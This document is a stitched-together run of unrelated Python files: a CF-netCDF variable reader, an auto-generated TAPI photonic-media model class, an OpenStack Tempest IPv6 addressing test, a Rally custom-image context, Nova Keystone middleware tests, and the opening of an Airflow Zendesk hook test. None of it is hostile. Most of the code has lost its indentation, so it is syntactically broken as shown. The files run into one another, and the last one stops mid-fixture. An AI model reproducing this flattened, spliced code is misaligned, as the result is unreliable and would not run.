Returns:
Boolean.
"""
# Scalar variables always span the target variable.
result = True
if self.dimensions:
source = self.dimensions
target = cf_variable.dimensions
# Ignore label string length dimension.
result = set(source[:-1]).issubset(target) or set(
source[1:]
).issubset(target)
return result
class CFMeasureVariable(CFVariable):
"""
A CF-netCDF measure variable is a variable that contains cell areas or volumes.
Identified by the CF-netCDF variable attribute 'cell_measures'.
Ref: [CF] Section 7.2. Cell Measures.
"""
cf_identity = "cell_measures"
def __init__(self, name, data, measure):
CFVariable.__init__(self, name, data)
#: Associated cell measure of the cell variable
self.cf_measure = measure
@classmethod
def identify(cls, variables, ignore=None, target=None, warn=True):
result = {}
ignore, target = cls._identify_common(variables, ignore, target)
# Identify all CF measure variables.
for nc_var_name, nc_var in target.items():
# Check for measure variable references.
nc_var_att = getattr(nc_var, cls.cf_identity, None)
if nc_var_att is not None:
for match_item in _CF_PARSE.finditer(nc_var_att):
match_group = match_item.groupdict()
measure = match_group["lhs"]
variable_name = match_group["rhs"]
                    var_differs = variable_name != nc_var_name
                    if variable_name not in ignore and var_differs:
if variable_name not in variables:
if warn:
message = "Missing CF-netCDF measure variable %r, referenced by netCDF variable %r"
warnings.warn(
message % (variable_name, nc_var_name)
)
else:
result[variable_name] = CFMeasureVariable(
variable_name,
variables[variable_name],
measure,
)
return result
class CFGroup(MutableMapping):
"""
Represents a collection of 'NetCDF Climate and Forecast (CF) Metadata
Conventions' variables and netCDF global attributes.
"""
def __init__(self):
#: Collection of CF-netCDF variables
self._cf_variables = {}
#: Collection of netCDF global attributes
self.global_attributes = {}
#: Collection of CF-netCDF variables promoted to a CFDataVariable.
self.promoted = {}
def _cf_getter(self, cls):
# Generate dictionary with dictionary comprehension.
return {
cf_name: cf_var
for cf_name, cf_var in self._cf_variables.items()
if isinstance(cf_var, cls)
}
@property
def ancillary_variables(self):
"""Collection of CF-netCDF ancillary variables."""
return self._cf_getter(CFAncillaryDataVariable)
@property
def auxiliary_coordinates(self):
"""Collection of CF-netCDF auxiliary coordinate variables."""
return self._cf_getter(CFAuxiliaryCoordinateVariable)
@property
def bounds(self):
"""Collection of CF-netCDF boundary variables."""
return self._cf_getter(CFBoundaryVariable)
@property
def climatology(self):
"""Collection of CF-netCDF climatology variables."""
return self._cf_getter(CFClimatologyVariable)
@property
def coordinates(self):
"""Collection of CF-netCDF coordinate variables."""
return self._cf_getter(CFCoordinateVariable)
@property
def data_variables(self):
"""Collection of CF-netCDF data pay-load variables."""
return self._cf_getter(CFDataVariable)
@property
def formula_terms(self):
"""Collection of CF-netCDF variables that participate in a CF-netCDF formula term."""
return {
cf_name: cf_var
for cf_name, cf_var in self._cf_variables.items()
if cf_var.has_formula_terms()
}
@property
def grid_mappings(self):
"""Collection of CF-netCDF grid mapping variables."""
return self._cf_getter(CFGridMappingVariable)
@property
def labels(self):
"""Collection of CF-netCDF label variables."""
return self._cf_getter(CFLabelVariable)
@property
def cell_measures(self):
"""Collection of CF-netCDF measure variables."""
return self._cf_getter(CFMeasureVariable)
@property
def non_data_variable_names(self):
"""
:class:`set` of the names of the CF-netCDF variables that are not
the data pay-load.
"""
non_data_variables = (
self.ancillary_variables,
self.auxiliary_coordinates,
self.bounds,
self.climatology,
self.coordinates,
self.grid_mappings,
self.labels,
self.cell_measures,
)
result = set()
for variable in non_data_variables:
result |= set(variable)
return result
def keys(self):
"""Return the names of all the CF-netCDF variables in the group."""
return self._cf_variables.keys()
def __len__(self):
return len(self._cf_variables)
def __iter__(self):
for item in self._cf_variables:
yield item
def __setitem__(self, name, variable):
if not isinstance(variable, CFVariable):
raise TypeError(
"Attempted to add an invalid CF-netCDF variable to the %s"
% self.__class__.__name__
)
if name != variable.cf_name:
raise ValueError(
"Mismatch between key name %r and CF-netCDF variable name %r"
% (str(name), variable.cf_name)
)
self._cf_variables[name] = variable
def __getitem__(self, name):
if name not in self._cf_variables:
raise KeyError(
"Cannot get unknown CF-netCDF variable name %r" % str(name)
)
return self._cf_variables[name]
def __delitem__(self, name):
if name not in self._cf_variables:
raise KeyError(
"Cannot delete unknown CF-netcdf variable name %r" % str(name)
)
del self._cf_variables[name]
def __repr__(self):
result = []
result.append("variables:%d" % len(self._cf_variables))
result.append("global_attributes:%d" % len(self.global_attributes))
result.append("promoted:%d" % len(self.promoted))
return "<%s of %s>" % (self.__class__.__name__, ", ".join(result))
class CFReader:
"""
This class allows the contents of a netCDF file to be interpreted according
to the 'NetCDF Climate and Forecast (CF) Metadata Conventions'.
"""
# All CF variable types EXCEPT for the "special cases" of
# CFDataVariable, CFCoordinateVariable and _CFFormulaTermsVariable.
_variable_types = (
CFAncillaryDataVariable,
CFAuxiliaryCoordinateVariable,
CFBoundaryVariable,
CFClimatologyVariable,
CFGridMappingVariable,
CFLabelVariable,
CFMeasureVariable,
)
# TODO: remove once iris.experimental.ugrid.CFUGridReader is folded in.
CFGroup = CFGroup
def __init__(self, filename, warn=False, monotonic=False):
self._filename = os.path.expanduser(filename)
#: Collection of CF-netCDF variables associated with this netCDF file
self.cf_group = self.CFGroup()
self._dataset = netCDF4.Dataset(self._filename, mode="r")
# Issue load optimisation warning.
if warn and self._dataset.file_format in [
"NETCDF3_CLASSIC",
"NETCDF3_64BIT",
]:
warnings.warn(
"Optimise CF-netCDF loading by converting data from NetCDF3 "
'to NetCDF4 file format using the "nccopy" command.'
)
self._check_monotonic = monotonic
self._translate()
self._build_cf_groups()
self._reset()
@property
def filename(self):
"""The file that the CFReader is reading."""
return self._filename
def __repr__(self):
return "%s(%r)" % (self.__class__.__name__, self._filename)
def _translate(self):
"""Classify the netCDF variables into CF-netCDF variables."""
netcdf_variable_names = list(self._dataset.variables.keys())
# Identify all CF coordinate variables first. This must be done
# first as, by CF convention, the definition of a CF auxiliary
# coordinate variable may include a scalar CF coordinate variable,
# whereas we want these two types of variables to be mutually exclusive.
coords = CFCoordinateVariable.identify(
self._dataset.variables, monotonic=self._check_monotonic
)
self.cf_group.update(coords)
coordinate_names = list(self.cf_group.coordinates.keys())
# Identify all CF variables EXCEPT for the "special cases".
for variable_type in self._variable_types:
# Prevent grid mapping variables being mis-identified as CF coordinate variables.
ignore = (
None
if issubclass(variable_type, CFGridMappingVariable)
else coordinate_names
)
self.cf_group.update(
variable_type.identify(self._dataset.variables, ignore=ignore)
)
# Identify global netCDF attributes.
attr_dict = {
attr_name: _getncattr(self._dataset, attr_name, "")
for attr_name in self._dataset.ncattrs()
}
self.cf_group.global_attributes.update(attr_dict)
# Identify and register all CF formula terms.
formula_terms = _CFFormulaTermsVariable.identify(
self._dataset.variables
)
for cf_var in formula_terms.values():
for cf_root, cf_term in cf_var.cf_terms_by_root.items():
# Ignore formula terms owned by a bounds variable.
if cf_root not in self.cf_group.bounds:
cf_name = cf_var.cf_name
if cf_var.cf_name not in self.cf_group:
self.cf_group[cf_name] = CFAuxiliaryCoordinateVariable(
cf_name, cf_var.cf_data
)
self.cf_group[cf_name].add_formula_term(cf_root, cf_term)
# Determine the CF data variables.
data_variable_names = (
set(netcdf_variable_names) - self.cf_group.non_data_variable_names
)
for name in data_variable_names:
self.cf_group[name] = CFDataVariable(
name, self._dataset.variables[name]
)
def _build_cf_groups(self):
"""Build the first order relationships between CF-netCDF variables."""
def _build(cf_variable):
# TODO: isinstance(cf_variable, UGridMeshVariable)
# UGridMeshVariable currently in experimental.ugrid - circular import.
is_mesh_var = cf_variable.cf_identity == "mesh"
ugrid_coord_names = []
ugrid_coords = getattr(self.cf_group, "ugrid_coords", None)
if ugrid_coords is not None:
ugrid_coord_names = list(ugrid_coords.keys())
coordinate_names = list(self.cf_group.coordinates.keys())
cf_group = self.CFGroup()
# Build CF variable relationships.
for variable_type in self._variable_types:
ignore = []
# Avoid UGridAuxiliaryCoordinateVariables also being
# processed as CFAuxiliaryCoordinateVariables.
if not is_mesh_var:
ignore += ugrid_coord_names
# Prevent grid mapping variables being mis-identified as CF coordinate variables.
if not issubclass(variable_type, CFGridMappingVariable):
ignore += coordinate_names
match = variable_type.identify(
self._dataset.variables,
ignore=ignore,
target=cf_variable.cf_name,
warn=False,
)
# Sanity check dimensionality coverage.
for cf_name, cf_var in match.items():
# No span check is necessary if variable is attached to a mesh.
if is_mesh_var or cf_var.spans(cf_variable):
cf_group[cf_name] = self.cf_group[cf_name]
else:
# Register the ignored variable.
# N.B. 'ignored' variable from enclosing scope.
ignored.add(cf_name)
msg = (
"Ignoring variable {!r} referenced "
"by variable {!r}: Dimensions {!r} do not "
"span {!r}".format(
cf_name,
cf_variable.cf_name,
cf_var.dimensions,
cf_variable.dimensions,
)
)
warnings.warn(msg)
# Build CF data variable relationships.
if isinstance(cf_variable, CFDataVariable):
# Add global netCDF attributes.
cf_group.global_attributes.update(
self.cf_group.global_attributes
)
# Add appropriate "dimensioned" CF coordinate variables.
cf_group.update(
{
cf_name: self.cf_group[cf_name]
for cf_name in cf_variable.dimensions
if cf_name in self.cf_group.coordinates
}
)
# Add appropriate "dimensionless" CF coordinate variables.
coordinates_attr = getattr(cf_variable, "coordinates", "")
cf_group.update(
{
cf_name: self.cf_group[cf_name]
for cf_name in coordinates_attr.split()
if cf_name in self.cf_group.coordinates
}
)
# Add appropriate formula terms.
for cf_var in self.cf_group.formula_terms.values():
for cf_root in cf_var.cf_terms_by_root:
if (
cf_root in cf_group
and cf_var.cf_name not in cf_group
):
# Sanity check dimensionality.
if cf_var.spans(cf_variable):
cf_group[cf_var.cf_name] = cf_var
else:
# Register the ignored variable.
# N.B. 'ignored' variable from enclosing scope.
ignored.add(cf_var.cf_name)
msg = (
"Ignoring formula terms variable {!r} "
"referenced by data variable {!r} via "
"variable {!r}: Dimensions {!r} do not "
"span {!r}".format(
cf_var.cf_name,
cf_variable.cf_name,
cf_root,
cf_var.dimensions,
cf_variable.dimensions,
)
)
warnings.warn(msg)
# Add the CF group to the variable.
cf_variable.cf_group = cf_group
# Ignored variables are those that cannot be attached to a
# data variable as the dimensionality of that variable is not
# a subset of the dimensionality of the data variable.
ignored = set()
for cf_variable in self.cf_group.values():
_build(cf_variable)
# Determine whether there are any formula terms that
# may be promoted to a CFDataVariable and restrict promotion to only
        # those formula terms that reference a surface/phenomenon.
for cf_var in self.cf_group.formula_terms.values():
for cf_root, cf_term in cf_var.cf_terms_by_root.items():
cf_root_var = self.cf_group[cf_root]
name = cf_root_var.standard_name or cf_root_var.long_name
terms = reference_terms.get(name, [])
if isinstance(terms, str) or not isinstance(terms, Iterable):
terms = [terms]
cf_var_name = cf_var.cf_name
if (
cf_term in terms
and cf_var_name not in self.cf_group.promoted
):
data_var = CFDataVariable(cf_var_name, cf_var.cf_data)
self.cf_group.promoted[cf_var_name] = data_var
_build(data_var)
break
# Promote any ignored variables.
promoted = set()
not_promoted = ignored.difference(promoted)
while not_promoted:
cf_name = not_promoted.pop()
if (
cf_name not in self.cf_group.data_variables
and cf_name not in self.cf_group.promoted
):
data_var = CFDataVariable(
cf_name, self.cf_group[cf_name].cf_data
)
self.cf_group.promoted[cf_name] = data_var
_build(data_var)
# Determine whether there are still any ignored variables
# yet to be promoted.
promoted.add(cf_name)
not_promoted = ignored.difference(promoted)
def _reset(self):
"""Reset the attribute touch history of each variable."""
for nc_var_name in self._dataset.variables.keys():
self.cf_group[nc_var_name].cf_attrs_reset()
def __del__(self):
# Explicitly close dataset to prevent file remaining open.
self._dataset.close()
def _getncattr(dataset, attr, default=None):
"""
Simple wrapper round `netCDF4.Dataset.getncattr` to make it behave
more like `getattr`.
"""
try:
value = dataset.getncattr(attr)
except AttributeError:
value = default
return value
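if __name__ == "__main__":
    # Minimal usage sketch (not part of the library): classify the variables
    # of a CF-compliant netCDF file (path hypothetical) and summarise the
    # per-data-variable CF groups built by CFReader.
    import sys
    reader = CFReader(sys.argv[1] if len(sys.argv) > 1 else "example.nc")
    print(reader)
    for cf_name, cf_var in sorted(reader.cf_group.data_variables.items()):
        print("data variable %r: dimensions %r" % (cf_name, cf_var.dimensions))
        print("  coordinates: %r" % sorted(cf_var.cf_group.coordinates))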
|
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_photonic_media_media_channel_properties_pac import TapiPhotonicMediaMediaChannelPropertiesPac # noqa: F401,E501
from tapi_server import util
class TapiPhotonicMediaOtsConnectionEndPointSpec(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, ots_media_channel=None): # noqa: E501
"""TapiPhotonicMediaOtsConnectionEndPointSpec - a model defined in OpenAPI
:param ots_media_channel: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec. # noqa: E501
:type ots_media_channel: TapiPhotonicMediaMediaChannelPropertiesPac
"""
self.openapi_types = {
'ots_media_channel': TapiPhotonicMediaMediaChannelPropertiesPac
}
self.attribute_map = {
'ots_media_channel': 'ots-media-channel'
}
self._ots_media_channel = ots_media_channel
@classmethod
def from_dict(cls, dikt) -> 'TapiPhotonicMediaOtsConnectionEndPointSpec':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.photonic.media.OtsConnectionEndPointSpec of this TapiPhotonicMediaOtsConnectionEndPointSpec. # noqa: E501
:rtype: TapiPhotonicMediaOtsConnectionEndPointSpec
"""
return util.deserialize_model(dikt, cls)
@property
def ots_media_channel(self):
"""Gets the ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:return: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:rtype: TapiPhotonicMediaMediaChannelPropertiesPac
"""
return self._ots_media_channel
@ots_media_channel.setter
def ots_media_channel(self, ots_media_channel):
"""Sets the ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:param ots_media_channel: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:type ots_media_channel: TapiPhotonicMediaMediaChannelPropertiesPac
"""
self._ots_media_channel = ots_media_channel
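# A minimal deserialization sketch (payload hypothetical), mirroring how the
# generated tapi_server controllers build model instances from request bodies:
#
#     body = {"ots-media-channel": None}
#     spec = TapiPhotonicMediaOtsConnectionEndPointSpec.from_dict(body)
#     assert spec.ots_media_channel is None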
|
import netaddr
from tempest import config
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestGettingAddress(manager.NetworkScenarioTest):
"""Create network with 2 subnets: IPv4 and IPv6 in a given address mode
Boot 2 VMs on this network
Allocate and assign 2 FIP4
Check that vNIC of server matches port data from OpenStack DB
Ping4 tenant IPv4 of one VM from another one
Will do the same with ping6 when available in VM
"""
@classmethod
def resource_setup(cls):
# Create no network resources for these tests.
cls.set_network_resources()
super(TestGettingAddress, cls).resource_setup()
@classmethod
def check_preconditions(cls):
if not (CONF.network_feature_enabled.ipv6
and CONF.network_feature_enabled.ipv6_subnet_attributes):
raise cls.skipException('IPv6 or its attributes not supported')
if not (CONF.network.tenant_networks_reachable
or CONF.network.public_network_id):
msg = ('Either tenant_networks_reachable must be "true", or '
'public_network_id must be defined.')
raise cls.skipException(msg)
if CONF.baremetal.driver_enabled:
msg = ('Baremetal does not currently support network isolation')
raise cls.skipException(msg)
super(TestGettingAddress, cls).check_preconditions()
def setUp(self):
super(TestGettingAddress, self).setUp()
self.keypair = self.create_keypair()
self.sec_grp = self._create_security_group(tenant_id=self.tenant_id)
self.srv_kwargs = {
'key_name': self.keypair['name'],
'security_groups': [{'name': self.sec_grp['name']}]}
def prepare_network(self, address6_mode):
"""Creates network with
one IPv6 subnet in the given mode and
one IPv4 subnet
Creates router with ports on both subnets
"""
self.network = self._create_network(tenant_id=self.tenant_id)
sub4 = self._create_subnet(network=self.network,
namestart='sub4',
ip_version=4,)
# since https://bugs.launchpad.net/neutron/+bug/1394112 we need
# to specify gateway_ip manually
net_range = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = (netaddr.IPAddress(net_range) + 1).format()
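        # e.g. a tenant_network_v6_cidr of 2001:db8::/64 yields the gateway
        # 2001:db8::1 (CIDR value illustrative only).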
sub6 = self._create_subnet(network=self.network,
namestart='sub6',
ip_version=6,
gateway_ip=gateway_ip,
ipv6_ra_mode=address6_mode,
ipv6_address_mode=address6_mode)
router = self._get_router(tenant_id=self.tenant_id)
sub4.add_to_router(router_id=router['id'])
sub6.add_to_router(router_id=router['id'])
self.addCleanup(sub4.delete)
self.addCleanup(sub6.delete)
@staticmethod
def define_server_ips(srv):
for net_name, nics in srv['addresses'].iteritems():
for nic in nics:
if nic['version'] == 6:
srv['accessIPv6'] = nic['addr']
else:
srv['accessIPv4'] = nic['addr']
def prepare_server(self):
username = CONF.compute.image_ssh_user
create_kwargs = self.srv_kwargs
create_kwargs['networks'] = [{'uuid': self.network.id}]
srv = self.create_server(create_kwargs=create_kwargs)
fip = self.create_floating_ip(thing=srv)
self.define_server_ips(srv=srv)
ssh = self.get_remote_client(
server_or_ip=fip.floating_ip_address,
username=username)
return ssh, srv
def _prepare_and_test(self, address6_mode):
self.prepare_network(address6_mode=address6_mode)
ssh1, srv1 = self.prepare_server()
ssh2, srv2 = self.prepare_server()
result = ssh1.get_ip_list()
self.assertIn(srv1['accessIPv4'], result)
# v6 should be configured since the image supports it
self.assertIn(srv1['accessIPv6'], result)
result = ssh2.get_ip_list()
self.assertIn(srv2['accessIPv4'], result)
# v6 should be configured since the image supports it
self.assertIn(srv2['accessIPv6'], result)
result = ssh1.ping_host(srv2['accessIPv4'])
self.assertIn('0% packet loss', result)
result = ssh2.ping_host(srv1['accessIPv4'])
self.assertIn('0% packet loss', result)
# Some VM (like cirros) may not have ping6 utility
result = ssh1.exec_command('whereis ping6')
        is_ping6 = result != 'ping6:\n'
if is_ping6:
result = ssh1.ping_host(srv2['accessIPv6'])
self.assertIn('0% packet loss', result)
result = ssh2.ping_host(srv1['accessIPv6'])
self.assertIn('0% packet loss', result)
else:
LOG.warning('Ping6 is not available, skipping')
@test.services('compute', 'network')
def test_slaac_from_os(self):
self._prepare_and_test(address6_mode='slaac')
@test.services('compute', 'network')
def test_dhcp6_stateless_from_os(self):
self._prepare_and_test(address6_mode='dhcpv6-stateless')
|
import abc
import six
from rally.common import broker
from rally.common.i18n import _
from rally.common import log as logging
from rally.common import utils
from rally import consts
from rally import osclients
from rally.plugins.openstack.scenarios.nova import utils as nova_utils
from rally.plugins.openstack.scenarios.vm import vmtasks
from rally.task import context
from rally.task import types
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
@context.configure(name="custom_image", order=500, hidden=True)
class BaseCustomImageGenerator(context.Context):
"""Base class for the contexts providing customized image with.
Every context class for the specific customization must implement
the method `_customize_image` that is able to connect to the server
using SSH and e.g. install applications inside it.
This is used e.g. to install the benchmark application using SSH
access.
This base context class provides a way to prepare an image with
custom preinstalled applications. Basically, this code boots a VM, calls
the `_customize_image` and then snapshots the VM disk, removing the VM
afterwards. The image UUID is stored in the user["custom_image"]["id"]
and can be used afterwards by scenario.
"""
CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"image": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
}
},
"flavor": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
}
},
"username": {
"type": "string"
},
"password": {
"type": "string"
},
"floating_network": {
"type": "string"
},
"internal_network": {
"type": "string"
},
"port": {
"type": "integer",
"minimum": 1,
"maximum": 65535
},
"userdata": {
"type": "string"
},
"workers": {
"type": "integer",
"minimum": 1,
}
},
"required": ["image", "flavor"],
"additionalProperties": False
}
DEFAULT_CONFIG = {
"username": "root",
"port": 22,
"workers": 1
}
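    # A task-file config sketch this schema accepts (values illustrative only):
    #
    #     "custom_image": {
    #         "image": {"name": "^cirros.*uec$"},
    #         "flavor": {"name": "m1.tiny"},
    #         "username": "cirros",
    #         "workers": 2
    #     }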
@utils.log_task_wrapper(LOG.info, _("Enter context: `custom_image`"))
def setup(self):
"""Creates custom image(s) with preinstalled applications.
When admin is present creates one public image that is usable
from all the tenants and users. Otherwise create one image
per user and tenant.
"""
if "admin" in self.context:
# NOTE(pboldin): Create by first user and make it public by
# the admin
user = self.context["users"][0]
tenant = self.context["tenants"][user["tenant_id"]]
nics = None
if "networks" in tenant:
nics = [{"net-id": tenant["networks"][0]["id"]}]
custom_image = self.create_one_image(user, nics=nics)
self.make_image_public(custom_image)
for tenant in self.context["tenants"].values():
tenant["custom_image"] = custom_image
else:
def publish(queue):
users = self.context.get("users", [])
for user, tenant_id in utils.iterate_per_tenants(users):
queue.append((user, tenant_id))
def consume(cache, args):
user, tenant_id = args
tenant = self.context["tenants"][tenant_id]
tenant["custom_image"] = self.create_one_image(user)
broker.run(publish, consume, self.config["workers"])
def create_one_image(self, user, **kwargs):
"""Create one image for the user."""
clients = osclients.Clients(user["endpoint"])
image_id = types.ImageResourceType.transform(
clients=clients, resource_config=self.config["image"])
flavor_id = types.FlavorResourceType.transform(
clients=clients, resource_config=self.config["flavor"])
vm_scenario = vmtasks.VMTasks(self.context, clients=clients)
server, fip = vm_scenario._boot_server_with_fip(
name=vm_scenario._generate_random_name("rally_ctx_custom_image_"),
image=image_id, flavor=flavor_id,
floating_network=self.config.get("floating_network"),
userdata=self.config.get("userdata"),
key_name=user["keypair"]["name"],
security_groups=[user["secgroup"]["name"]],
**kwargs)
LOG.debug("Installing benchmark on %r %s", server, fip["ip"])
self.customize_image(server, fip, user)
LOG.debug("Stopping server %r", server)
vm_scenario._stop_server(server)
LOG.debug("Creating snapshot for %r", server)
custom_image = vm_scenario._create_image(server).to_dict()
vm_scenario._delete_server_with_fip(server, fip)
return custom_image
def make_image_public(self, custom_image):
"""Make the image available publicly."""
admin_clients = osclients.Clients(self.context["admin"]["endpoint"])
LOG.debug("Making image %r public", custom_image["id"])
admin_clients.glance().images.get(
custom_image["id"]).update(is_public=True)
@utils.log_task_wrapper(LOG.info, _("Exit context: `custom_image`"))
def cleanup(self):
"""Delete created custom image(s)."""
if "admin" in self.context:
user = self.context["users"][0]
tenant = self.context["tenants"][user["tenant_id"]]
if "custom_image" in tenant:
self.delete_one_image(user, tenant["custom_image"])
tenant.pop("custom_image")
else:
def publish(queue):
users = self.context.get("users", [])
for user, tenant_id in utils.iterate_per_tenants(users):
queue.append((user, tenant_id))
def consume(cache, args):
user, tenant_id = args
tenant = self.context["tenants"][tenant_id]
if "custom_image" in tenant:
self.delete_one_image(user, tenant["custom_image"])
tenant.pop("custom_image")
broker.run(publish, consume, self.config["workers"])
def delete_one_image(self, user, custom_image):
"""Delete the image created for the user and tenant."""
clients = osclients.Clients(user["endpoint"])
nova_scenario = nova_utils.NovaScenario(
context=self.context, clients=clients)
with logging.ExceptionLogger(
LOG, _("Unable to delete image %s") % custom_image["id"]):
custom_image = nova_scenario.clients("nova").images.get(
custom_image["id"])
nova_scenario._delete_image(custom_image)
@utils.log_task_wrapper(LOG.info,
_("Custom image context: customizing"))
def customize_image(self, server, ip, user):
return self._customize_image(server, ip, user)
@abc.abstractmethod
def _customize_image(self, server, ip, user):
"""Override this method with one that customizes image.
Basically, code can simply call `VMScenario._run_command` function
specifying an installation script and interpreter. This script will
be then executed using SSH.
:param server: nova.Server instance
:param ip: dict with server IP details
:param user: user who started a VM instance. Used to extract keypair
"""
pass
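# A minimal concrete context sketch (names hypothetical; the SSH/command
# plumbing is elided rather than guessed from VMScenario internals):
#
#     @context.configure(name="noop_custom_image", order=501, hidden=True)
#     class NoopImageGenerator(BaseCustomImageGenerator):
#         def _customize_image(self, server, ip, user):
#             # e.g. SSH to ip["ip"] as self.config["username"] and run an
#             # installation script inside the guest.
#             pass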
|
__author__ = 'rabitdash'
|
from oslo.config import cfg
from oslo.middleware import request_id
from oslo.serialization import jsonutils
import webob
import webob.exc
import nova.api.auth
from nova.i18n import _
from nova import test
CONF = cfg.CONF
class TestNovaKeystoneContextMiddleware(test.NoDBTestCase):
def setUp(self):
super(TestNovaKeystoneContextMiddleware, self).setUp()
@webob.dec.wsgify()
def fake_app(req):
self.context = req.environ['nova.context']
return webob.Response()
self.context = None
self.middleware = nova.api.auth.NovaKeystoneContext(fake_app)
self.request = webob.Request.blank('/')
self.request.headers['X_TENANT_ID'] = 'testtenantid'
self.request.headers['X_AUTH_TOKEN'] = 'testauthtoken'
self.request.headers['X_SERVICE_CATALOG'] = jsonutils.dumps({})
def test_no_user_or_user_id(self):
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '401 Unauthorized')
def test_user_id_only(self):
self.request.headers['X_USER_ID'] = 'testuserid'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuserid')
def test_user_only(self):
self.request.headers['X_USER'] = 'testuser'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuser')
def test_user_id_trumps_user(self):
self.request.headers['X_USER_ID'] = 'testuserid'
self.request.headers['X_USER'] = 'testuser'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuserid')
def test_invalid_service_catalog(self):
self.request.headers['X_USER'] = 'testuser'
self.request.headers['X_SERVICE_CATALOG'] = "bad json"
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '500 Internal Server Error')
def test_request_id_extracted_from_env(self):
req_id = 'dummy-request-id'
self.request.headers['X_PROJECT_ID'] = 'testtenantid'
self.request.headers['X_USER_ID'] = 'testuserid'
self.request.environ[request_id.ENV_REQUEST_ID] = req_id
self.request.get_response(self.middleware)
self.assertEqual(req_id, self.context.request_id)
class TestKeystoneMiddlewareRoles(test.NoDBTestCase):
def setUp(self):
super(TestKeystoneMiddlewareRoles, self).setUp()
@webob.dec.wsgify()
def role_check_app(req):
context = req.environ['nova.context']
if "knight" in context.roles and "bad" not in context.roles:
return webob.Response(status="200 Role Match")
elif context.roles == ['']:
return webob.Response(status="200 No Roles")
else:
raise webob.exc.HTTPBadRequest(_("unexpected role header"))
self.middleware = nova.api.auth.NovaKeystoneContext(role_check_app)
self.request = webob.Request.blank('/')
self.request.headers['X_USER'] = 'testuser'
self.request.headers['X_TENANT_ID'] = 'testtenantid'
self.request.headers['X_AUTH_TOKEN'] = 'testauthtoken'
self.request.headers['X_SERVICE_CATALOG'] = jsonutils.dumps({})
self.roles = "pawn, knight, rook"
def test_roles(self):
self.request.headers['X_ROLES'] = 'pawn,knight,rook'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 Role Match')
def test_roles_empty(self):
self.request.headers['X_ROLES'] = ''
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 No Roles')
def test_no_role_headers(self):
# Test with no role headers set.
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 No Roles')
class TestPipeLineFactory(test.NoDBTestCase):
class FakeFilter(object):
def __init__(self, name):
self.name = name
self.obj = None
def __call__(self, obj):
self.obj = obj
return self
class FakeApp(object):
def __init__(self, name):
self.name = name
    class FakeLoader(object):
def get_filter(self, name):
return TestPipeLineFactory.FakeFilter(name)
def get_app(self, name):
return TestPipeLineFactory.FakeApp(name)
def _test_pipeline(self, pipeline, app):
for p in pipeline.split()[:-1]:
self.assertEqual(app.name, p)
self.assertIsInstance(app, TestPipeLineFactory.FakeFilter)
app = app.obj
self.assertEqual(app.name, pipeline.split()[-1])
self.assertIsInstance(app, TestPipeLineFactory.FakeApp)
def test_pipeline_factory(self):
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, noauth=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_v21(self):
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory_v21(
TestPipeLineFactory.FakeLoader(), None, noauth=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_with_rate_limits(self):
CONF.set_override('api_rate_limit', True)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_without_rate_limits(self):
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline1 = 'test1 test2 test3'
fake_pipeline2 = 'test4 test5 test6'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None,
keystone_nolimit=fake_pipeline1,
keystone=fake_pipeline2)
self._test_pipeline(fake_pipeline1, app)
def test_pipeline_factory_missing_nolimits_pipeline(self):
CONF.set_override('api_rate_limit', False)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_compatibility_with_v3(self):
CONF.set_override('api_rate_limit', True)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 ratelimit_v3 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline('test1 test3', app)
|
from unittest.mock import patch
import pytest
from zenpy.lib.api_objects import Ticket
from airflow.models import Connection
from airflow.providers.zendesk.hooks.zendesk import ZendeskHook
from airflow.utils import db
class TestZendeskHook:
conn_id = 'zendesk_conn_id_test'
@pytest.fixture(autouse=True)
def init_connection(self):
db.merge_conn(
Connection(
conn_id=self.conn_id,
conn_type='zendesk',
host='yoursubdomain.zendesk.com',
login='user@gmail.com',
password='eb243592-faa2-4ba2-a551q-1afdf565c889',
)
)
